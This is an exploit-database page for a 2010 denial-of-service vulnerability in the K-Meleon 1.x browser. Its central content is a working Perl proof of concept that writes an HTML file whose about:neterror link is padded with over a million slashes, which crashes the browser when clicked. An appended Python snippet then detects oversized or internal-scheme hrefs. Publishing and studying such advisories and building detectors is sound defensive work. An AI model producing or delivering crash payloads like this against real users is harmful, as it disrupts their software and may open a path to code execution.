Exploit K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities

Exploiter

18 Dec 2022
EDB-ID: 34404
EDB verification: Passed
Author: LOSTMON
Vulnerability type: DOS
Platform: WINDOWS
CVE: N/A
Publication date: 2010-08-04
K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities
Code:
source: https://www.securityfocus.com/bid/42200/info

K-Meleon is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code; this has not been confirmed.

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords [email protected] http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file, open it with k-meleon, click on the link and wait a few seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";
# stop here: without a file name there is nothing to write
exit 1;

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

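# open the output file for writing (the '<' mode would open it read-only)
open(FILE, '>', $archivo) or die "Cannot open $archivo: $!\n";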
print FILE $datos;
close(FILE);
 
Source
www.exploit-db.com
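
A defensive check for the pattern described above, as an added example that is not part of the original advisory or the author's code: it scans HTML for anchors whose href is abnormally long or points at a browser-internal scheme such as about:. The 8192-character threshold, the scheme list, the function names and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

MAX_HREF_LEN = 8192  # assumed threshold, tune per environment
INTERNAL_SCHEMES = {"about", "chrome", "resource"}  # assumed internal schemes


class AnchorAuditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name != "href" or not value:
                continue
            reasons = []
            if len(value) > MAX_HREF_LEN:
                reasons.append("oversized-href")
            # Only a short prefix before the first ':' can be a scheme.
            scheme, sep, _ = value[:32].partition(":")
            if sep and scheme.strip().lower() in INTERNAL_SCHEMES:
                reasons.append("internal-scheme")
            if reasons:
                self.findings.append(
                    {"line": self.getpos()[0], "length": len(value),
                     "prefix": value[:40], "reasons": reasons})


def audit_html(text):
    auditor = AnchorAuditor()
    auditor.feed(text)
    auditor.close()
    return auditor.findings


# Constructed sample input (not taken from the page).
SAMPLE = (
    "<html>\n"
    '<a href="https://example.org/docs">ordinary link</a>\n'
    '<a href="about:neterror?e=connectionFailure">internal page link</a>\n'
    '<a href="https://example.org/?q=' + "A" * 10000 + '">oversized link</a>\n'
    "</html>\n"
)

if __name__ == "__main__":
    for finding in audit_html(SAMPLE):
        print(finding)
```

Findings carry only the first 40 characters of each href, so a report over a hostile page stays small.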